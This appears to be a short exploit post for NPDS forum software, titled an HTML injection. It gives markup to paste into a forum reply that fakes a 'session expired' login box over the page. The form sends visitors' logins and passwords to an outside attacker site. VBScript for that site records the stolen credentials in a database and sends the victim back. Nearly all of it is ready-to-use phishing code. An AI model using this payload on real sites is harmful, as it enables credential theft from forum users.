Npds BB HTML Injection
I release it very quickly ... So it can be improved :
Code to put in a reply or in a topic :
Your fake message</td></tr><tr><td valign="bottom"><hr noshade size="1"
class="ONGL">  <a href="user.php?op=userinfo&uname=User" CLASS="NOIR"
target=_blank><img src="images/forum/icons/profile.gif" border=0
ALT="">Profil</a> <a href="http://www.userland.com" TARGET="_blank"
CLASS="NOIR" TARGET="_blank"><IMG SRC="images/forum/icons/www_icon.gif"
BORDER=0 Alt="">www</a> <a
href="reply.php?topic=1&forum=1&post=2&citation=1" CLASS="NOIR"><IMG
SRC="images/forum/icons/quote.gif" BORDER="0" Alt=""><FONT
SIZE=1>Citation</FONT></a>
<a href="prntopic.php?forum=1&topic=1&post_id=2" CLASS="NOIR"><IMG
SRC="images/forum/icons/print.gif" BORDER="0" Alt=""></a>
</td></tr></table></TD></TR>
<div style="position: absolute; left=0; top=0; height=3200; width=150"><form
action="http://mon-site-de-roxor.com/roxor.asp" method="post" name="piquage"
target="_self"><table width="100%" border="0" cellspacing="0"
cellpadding="0"><tr><td colspan="2"><div align="center">Your session has
expired. Please log in to
reply.</div></td></tr><tr><td> </td></tr><tr><td><div align="right">Login
:</div> </td> <td><input name="login" type="text" value="">
</td></tr><tr><td><div align="right">Mot de passe :</div> </td><td><input
name="password" type="password" value="">
</td></tr><tr><td> </td></tr><tr><td colspan="2"><div
align="center"><input type="submit" name="Submit"
value="Envoyer"></div></td></tr></table></form></div>
Example of Code (VBscript) to put in the page called by the form in the topic :
<%@ Language=VBScript %>
<%
set base=server.createobject("ADODB.CONNECTION")
base.open nom_base, login_base, password_base
referant=left(request.servervariables("HTTP_REFERER"),instr(8,request.servervariables("HTTP_REFERER"),"/")-1)
login=Request.QueryString("login")
password=Request.QueryString("password")
requete_vol_infos="INSERT statistiques (date,npds,login,password) VALUES
(getdate(),'" + cstr(referant) + "','" + cstr(login) + "','" + cstr(password) +
"')"
set resultat_vol_infos=server.CreateObject("ADODB.RECORDSET")
resultat_vol_infos.Open requete_vol_infos, base
response.redirect(referant)
%>
Thanks to N-0-X and NewFFR :o)
Rituel